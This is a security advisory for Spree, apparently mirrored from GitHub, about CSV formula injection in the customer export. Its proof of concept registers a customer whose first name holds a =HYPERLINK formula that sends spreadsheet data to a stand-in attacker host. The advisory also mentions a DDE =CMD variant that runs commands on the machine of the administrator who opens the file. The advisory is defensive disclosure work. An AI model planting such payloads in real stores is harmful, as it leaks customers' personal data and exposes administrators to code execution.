GHSA-XF4V-W5X5-PV79
Vulnerability from github – Published: 2026-06-04 18:46 – Updated: 2026-06-04 18:46
VLAI
Summary
Spree: CSV Formula Injection in Customer Export
Details
Summary
CSV formula injection (also known as formula injection or CSV injection) affects customer export. User-controlled values customer names, email addresses, and shipping addresses. When an administrator opens a crafted Export in Microsoft Excel or LibreOffice Calc, formulas embedded in user data execute in the context of the administrator's desktop, potentially exfiltrating data or executing OS commands via DDE (Dynamic Data Exchange).
Details
Affected presenters and fields
| Presenter | Path | User-controlled fields |
|---|---|---|
CustomerPresenter |
spree/core/app/presenters/spree/csv/customer_presenter.rb:36 |
first_name, last_name, address1, address2, city, phone |
Vulnerable code — customer_presenter.rb (representative example)
# spree/core/app/presenters/spree/csv/customer_presenter.rb:36–53
def call
csv = [
customer.first_name, # ← written verbatim; may contain =HYPERLINK(...)
customer.last_name, # ← user-controlled
customer.email,
customer.accepts_email_marketing ? Spree.t(:say_yes) : Spree.t(:say_no),
customer.address&.company, # ← user-controlled
customer.address&.address1, # ← user-controlled
customer.address&.address2, # ← user-controlled
customer.address&.city, # ← user-controlled
customer.address&.state_text,
customer.address&.state_abbr,
customer.address&.country&.name,
customer.address&.country&.iso,
customer.address&.zipcode,
customer.phone, # ← user-controlled
customer.amount_spent_in(Spree::Store.current.default_currency),
customer.completed_orders.count,
]
csv += metafields_for_csv(customer)
csv
end
PoC
Precondition: A Spree store with public customer registration enabled (default configuration). No special permissions required for the attacker.
Step 1 — Register as a customer with an injected first name
curl -X POST https://store.example.com/api/v3/store/customers \
-H "Content-Type: application/json" \
-H "X-Spree-Api-Key: pk_<publishable_api_key>" \
-d '{
"email": "attacker@evil.com",
"password": "password123",
"password_confirmation": "password123",
"first_name": "=HYPERLINK(\"http://attacker.example.com/exfil?d=\"&B1,\"Click\")",
"last_name": "Smith"
}'
Step 2 — Admin triggers a customer export
curl -X POST https://store.example.com/api/v3/admin/exports \
-H "Authorization: Bearer <admin_jwt>" \
-H "Content-Type: application/json" \
-d '{"type": "Spree::Exports::Customers", "record_selection": "all"}'
Step 3 — Admin polls until ready, then downloads
# Poll for completion
curl https://store.example.com/api/v3/admin/exports/<export_id> \
-H "Authorization: Bearer <admin_jwt>"
# Download
curl https://store.example.com/api/v3/admin/exports/<export_id>/download \
-H "Authorization: Bearer <admin_jwt>" \
-o customers.csv
Step 4 — Verify injection in the raw CSV (without opening in Excel)
Open customers.csv in a text editor. The first data row will contain:
"=HYPERLINK(""http://attacker.example.com/exfil?d=""&B1,""Click"")","Smith","attacker@evil.com",...
Step 5 — Admin opens customers.csv in Microsoft Excel (Windows)
- Excel warns about external data connections; if the administrator clicks Enable, the
HYPERLINKformula fires and sends a GET request tohttp://attacker.example.com/exfil?d=<B1_value>. - Cell B1 in the customers export is the Last Name column. Adjacent columns contain email, address, and order total data for all exported customers.
- With the DDE variant (
=CMD|...) on older or unpatched Excel versions, a subprocess is launched on the administrator's machine.
Impact
Vulnerability class: CSV / Formula Injection (CWE-1236)
Who is impacted
- Administrators who download and open export files in spreadsheet software are the direct victims. Administrative accounts have access to all store data, payment method configurations, customer PII, and full order history.
Realistic attack chain
| Step | Actor | Action | Privilege required |
|---|---|---|---|
| 1 | Attacker | Registers as customer | Public registration |
| 2 | Attacker | Sets first_name to formula payload |
None beyond registration |
| 3 | Admin | Runs a routine weekly/monthly export | Normal operational task |
| 4 | Admin | Opens CSV in Excel | None |
| 5 | Attacker | Receives exfiltrated spreadsheet data | Passive |
Data at risk
All data visible to the administrator in the spreadsheet at the time of opening, including:
- All exported customer emails, names, addresses, phone numbers
- Order totals and purchase history
- Any other columns in the same export file
Severity
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "spree"
},
"ranges": [
{
"events": [
{
"introduced": "5.2.0"
},
{
"fixed": "5.2.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "spree"
},
"ranges": [
{
"events": [
{
"introduced": "5.3.0"
},
{
"fixed": "5.3.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "spree"
},
"ranges": [
{
"events": [
{
"introduced": "5.4.0"
},
{
"fixed": "5.4.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-1236"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-04T18:46:04Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\nCSV formula injection (also known as formula injection or CSV injection) affects customer export. User-controlled values customer names, email addresses, and shipping addresses. When an administrator opens a crafted\nExport in Microsoft Excel or LibreOffice Calc, formulas embedded in user data execute in the\ncontext of the administrator\u0027s desktop, potentially exfiltrating data or executing OS commands\nvia DDE (Dynamic Data Exchange).\n\n---\n\n### Details\n\n#### Affected presenters and fields\n\n| Presenter | Path | User-controlled fields |\n|---|---|---|\n| `CustomerPresenter` | `spree/core/app/presenters/spree/csv/customer_presenter.rb:36` | `first_name`, `last_name`, `address1`, `address2`, `city`, `phone` |\n\n#### Vulnerable code \u2014 `customer_presenter.rb` (representative example)\n\n```ruby\n# spree/core/app/presenters/spree/csv/customer_presenter.rb:36\u201353\ndef call\n csv = [\n customer.first_name, # \u2190 written verbatim; may contain =HYPERLINK(...)\n customer.last_name, # \u2190 user-controlled\n customer.email, \n customer.accepts_email_marketing ? Spree.t(:say_yes) : Spree.t(:say_no),\n customer.address\u0026.company, # \u2190 user-controlled\n customer.address\u0026.address1, # \u2190 user-controlled\n customer.address\u0026.address2, # \u2190 user-controlled\n customer.address\u0026.city, # \u2190 user-controlled\n customer.address\u0026.state_text,\n customer.address\u0026.state_abbr,\n customer.address\u0026.country\u0026.name,\n customer.address\u0026.country\u0026.iso,\n customer.address\u0026.zipcode,\n customer.phone, # \u2190 user-controlled\n customer.amount_spent_in(Spree::Store.current.default_currency),\n customer.completed_orders.count,\n ]\n csv += metafields_for_csv(customer)\n csv\nend\n```\n\n---\n\n### PoC\n\n**Precondition**: A Spree store with public customer registration enabled (default\nconfiguration). No special permissions required for the attacker.\n\n#### Step 1 \u2014 Register as a customer with an injected first name\n\n```bash\ncurl -X POST https://store.example.com/api/v3/store/customers \\\n -H \"Content-Type: application/json\" \\\n -H \"X-Spree-Api-Key: pk_\u003cpublishable_api_key\u003e\" \\\n -d \u0027{\n \"email\": \"attacker@evil.com\",\n \"password\": \"password123\",\n \"password_confirmation\": \"password123\",\n \"first_name\": \"=HYPERLINK(\\\"http://attacker.example.com/exfil?d=\\\"\u0026B1,\\\"Click\\\")\",\n \"last_name\": \"Smith\"\n }\u0027\n```\n\n#### Step 2 \u2014 Admin triggers a customer export\n\n```bash\ncurl -X POST https://store.example.com/api/v3/admin/exports \\\n -H \"Authorization: Bearer \u003cadmin_jwt\u003e\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"type\": \"Spree::Exports::Customers\", \"record_selection\": \"all\"}\u0027\n```\n\n#### Step 3 \u2014 Admin polls until ready, then downloads\n\n```bash\n# Poll for completion\ncurl https://store.example.com/api/v3/admin/exports/\u003cexport_id\u003e \\\n -H \"Authorization: Bearer \u003cadmin_jwt\u003e\"\n\n# Download\ncurl https://store.example.com/api/v3/admin/exports/\u003cexport_id\u003e/download \\\n -H \"Authorization: Bearer \u003cadmin_jwt\u003e\" \\\n -o customers.csv\n```\n\n#### Step 4 \u2014 Verify injection in the raw CSV (without opening in Excel)\n\nOpen `customers.csv` in a text editor. The first data row will contain:\n\n```\n\"=HYPERLINK(\"\"http://attacker.example.com/exfil?d=\"\"\u0026B1,\"\"Click\"\")\",\"Smith\",\"attacker@evil.com\",...\n```\n\n#### Step 5 \u2014 Admin opens `customers.csv` in Microsoft Excel (Windows)\n\n- Excel warns about external data connections; if the administrator clicks **Enable**, the\n `HYPERLINK` formula fires and sends a GET request to `http://attacker.example.com/exfil?d=\u003cB1_value\u003e`.\n- Cell B1 in the customers export is the **Last Name** column. Adjacent columns contain\n email, address, and order total data for all exported customers.\n- With the DDE variant (`=CMD|...`) on older or unpatched Excel versions, a subprocess\n is launched on the administrator\u0027s machine.\n\n---\n\n### Impact\n\n**Vulnerability class**: CSV / Formula Injection (CWE-1236)\n\n#### Who is impacted\n\n- **Administrators** who download and open export files in spreadsheet software are the\n direct victims. Administrative accounts have access to all store data, payment method\n configurations, customer PII, and full order history.\n\n#### Realistic attack chain\n\n| Step | Actor | Action | Privilege required |\n|---|---|---|---|\n| 1 | Attacker | Registers as customer | Public registration |\n| 2 | Attacker | Sets `first_name` to formula payload | None beyond registration |\n| 3 | Admin | Runs a routine weekly/monthly export | Normal operational task |\n| 4 | Admin | Opens CSV in Excel | None |\n| 5 | Attacker | Receives exfiltrated spreadsheet data | Passive |\n\n#### Data at risk\n\nAll data visible to the administrator in the spreadsheet at the time of opening, including:\n\n- All exported customer emails, names, addresses, phone numbers\n- Order totals and purchase history\n- Any other columns in the same export file",
"id": "GHSA-xf4v-w5x5-pv79",
"modified": "2026-06-04T18:46:04Z",
"published": "2026-06-04T18:46:04Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/spree/spree/security/advisories/GHSA-xf4v-w5x5-pv79"
},
{
"type": "PACKAGE",
"url": "https://github.com/spree/spree"
},
{
"type": "WEB",
"url": "https://github.com/spree/spree/releases/tag/v5.2.8"
},
{
"type": "WEB",
"url": "https://github.com/spree/spree/releases/tag/v5.3.6"
},
{
"type": "WEB",
"url": "https://github.com/spree/spree/releases/tag/v5.4.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "Spree: CSV Formula Injection in Customer Export"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…